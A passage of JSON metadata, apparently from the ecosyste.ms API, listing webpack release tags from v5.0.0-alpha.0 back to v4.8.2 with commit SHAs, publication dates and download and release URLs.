hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206